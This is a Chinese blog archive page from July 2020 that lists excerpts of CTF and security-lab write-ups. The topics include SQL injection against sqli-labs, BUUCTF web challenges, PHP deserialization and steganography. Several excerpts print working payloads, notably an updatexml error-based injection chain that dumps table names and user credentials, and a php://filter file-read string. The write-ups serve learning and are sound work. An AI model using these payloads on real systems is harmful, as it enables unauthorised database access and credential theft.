07 2020 档案

摘要:aaencode:http://www.atoolbox.net/Tool.php?Id=703 颜文字加密 阅读全文
posted @ 2020-07-24 20:10 云千 阅读(3769) 评论(0) 推荐(0)
摘要:#问题描述 sqli-labs 26,27,都是过滤空格,为什么27可以用%0A绕过,26不行? #代码: 也就是个正则表达式的小问题 ##less 26 function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip ou 阅读全文
posted @ 2020-07-24 20:08 云千 阅读(274) 评论(0) 推荐(0)
摘要:注入点在cookie; 工具:火狐插件:Edit This Cookie 阅读全文
posted @ 2020-07-23 18:48 云千 阅读(633) 评论(0) 推荐(0)
摘要:session.auto_start=0 修改为 session.auto_start=1; output_buffering = Off 修改为 output_buffering = On; 阅读全文
posted @ 2020-07-23 14:57 云千 阅读(368) 评论(0) 推荐(0)
摘要:updatexml(1,concat(0x7e,(select database()),0x7e),1) updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) updatexml(1,concat(0x7e,(select group_concat( column_name ) from information_schema.columns where table_name='users'),0x7e),1) updatexml(1,concat(0x7e,(select substr((select group_concat(id,0x3a,username,0x3a,password) from security.users),1,20)),0x7e),1) 阅读全文
posted @ 2020-07-22 18:11 云千 阅读(185) 评论(0) 推荐(0)
摘要:知识点 1.data://text/plain;base64,数据(base64加密后) 2.php://filter/read=convert.base64-encode/resource=文件名 阅读全文
posted @ 2020-07-16 15:59 云千 阅读(406) 评论(0) 推荐(1)
摘要:[极客大挑战 2019]Upload 从页面上来看是上传一个图片文件,但是不知道是怎样检查的,要先试一试 一般可以检查的地方有: 后缀名、content-type、文件头的部分内容 先上传一个php,不做任何修改 接下来试一下phtml+修改content-type phtml一般是指嵌入了php代 阅读全文
posted @ 2020-07-15 22:39 云千 阅读(3117) 评论(3) 推荐(4)
摘要:[极客大挑战 2019]Secret File 打开来漆黑一片 但是检查源码会发现有一行没有显示出来 这是一个链接,点开: 再点开: 但是控制台的网络选项里可以看到: 这个action.php没有看到 直接访问action.php也会立刻跳转到end.php 所以抓包,看到了一个secr3t.php 阅读全文
posted @ 2020-07-15 22:36 云千 阅读(196) 评论(0) 推荐(0)
摘要:[极客大挑战 2019]RCE ME 这道题不是很好做,我本人其实也不太会,有问题欢迎指出~ 打开题目是这样的 代码的大概意思是GET方式获取code,如果长度超过40 不执行,含有字母数字不执行,满足条件就当做php执行并且不报错 可以用异或或者取反绕过 参考:https://www.cnblog 阅读全文
posted @ 2020-07-15 22:33 云千 阅读(3611) 评论(3) 推荐(1)
摘要:[极客大挑战 2019]PHP 知识点: 1.网站的备份文件:www.zip 2.Php 反序列化漏洞:当反序列化字符串时,如果表示属性个数的值大于真实属性个数,就会跳过_wakeup函数的执行 备份泄露,应该可以用工具扫目录扫出来,但是不知道为什么用御剑和dirbuster都扫不出来。直接在url 阅读全文
posted @ 2020-07-15 22:27 云千 阅读(3172) 评论(0) 推荐(1)
摘要:[极客大挑战 2019]Knife 打开 提示很明显,有一个菜刀,还有一句话木马也挂上了..需要做的就是把蚁剑或者菜刀连上去 直接就可以打开系统文件夹 在根目录下发现flag 阅读全文
posted @ 2020-07-15 22:24 云千 阅读(905) 评论(0) 推荐(0)
摘要:[极客大挑战 2019]Havefun 知识点:简单的get请求发送? 打开控制台,发现注释 尝试输入: ?cat=cat 没有回显 尝试输入: ?cat=dog 直接出flag 阅读全文
posted @ 2020-07-15 22:21 云千 阅读(206) 评论(0) 推荐(0)
摘要:[极客大挑战 2019]BuyFlag 题目 题目有三个要求,一是有100000000块钱,二是要求是CUIT的学生,三是有正确的密码。 检查代码,发现一段注释。意思是检查password,不能使数字类型,但是值要为404.很容易想到php的弱类型,在404后面加字符变成字符串类型,比较的时候会自动 阅读全文
posted @ 2020-07-15 22:20 云千 阅读(228) 评论(0) 推荐(0)
摘要:[RoarCTF 2019]Easy Calc #题目 题目打开是这样的 查看源码 .ajax是指通过http请求加载远程数据。 可以发现有一个calc.php,输入的算式会被传入到这个php文件里,尝试一下能不能打开 可以打开,并且显示了源码 foreach 语法结构提供了遍历数组的简单方式。 语 阅读全文
posted @ 2020-07-15 16:37 云千 阅读(1196) 评论(0) 推荐(0)
摘要:1.Referer&2.User-Agent&3.X-Forwarded-For 阅读全文
posted @ 2020-07-15 13:17 云千 阅读(1006) 评论(0) 推荐(0)
摘要:sql注入--sql盲注 阅读全文
posted @ 2020-07-15 13:12 云千 阅读(1139) 评论(0) 推荐(0)
摘要:sql注入--报错注入 阅读全文
posted @ 2020-07-15 13:08 云千 阅读(229) 评论(0) 推荐(0)
摘要:简单sql注入2 阅读全文
posted @ 2020-07-15 13:04 云千 阅读(1819) 评论(0) 推荐(1)
摘要:简单sql注入1 阅读全文
posted @ 2020-07-15 12:59 云千 阅读(4969) 评论(0) 推荐(1)
摘要:#问题描述 已安装pillow ,但是在pycharm 和 python 自带的编辑器中编译都失败 问题代码: from Pillow import Image #解决 一开始以为是pycharm的问题,解决方法参考: https://blog.csdn.net/qq_35120460/articl 阅读全文
posted @ 2020-07-15 08:53 云千 阅读(1117) 评论(0) 推荐(0)
摘要:需要双写绕过的sql注入 阅读全文
posted @ 2020-07-14 18:58 云千 阅读(809) 评论(0) 推荐(0)
摘要:#0x01 知识点 伪加密 steghide提取信息 #0x02 伪加密的判断 首先,在winhex分析,发现有4个zip文件的文件头和2个文件尾,有完整文件头尾那么可以直接修改后缀为zip解压, 查看一下压缩包里的文件,发现有加密,继续分析zip的部分 我们仔细看一下这一部分,会发现存在一个伪加密 阅读全文
posted @ 2020-07-14 11:36 云千 阅读(4692) 评论(0) 推荐(0)
摘要:###网络状态太差: 问题描述:下载过程断断续续;或者选择软件的时候选了太多,导致不断出现下载未完成就安装失败的情况。 解决:这个只要不停重复就可以下载完。 ###分配给虚拟机的硬盘空间太小: 问题描述:下载软件完成后,反复卡在安装软件失败这里,但是没有进行下载的操作。 解决:虚拟机分配硬盘空间太小 阅读全文
posted @ 2020-07-07 10:04 云千 阅读(3267) 评论(3) 推荐(0)
摘要:题目:bugku Misc论剑 第一步:在winhex里分析 发现文件头有两个 两个jpg文件中间还有一段二进制码 在kali里分离出两个一样jpg图片,但是没有什么发现 二进制码解出来也没有flag 然后就没有了思路。。。 找到网上的wp做了一遍,收获很多 修改jpg的宽高:FF C2 XX XX 阅读全文
posted @ 2020-07-03 13:41 云千 阅读(576) 评论(0) 推荐(0)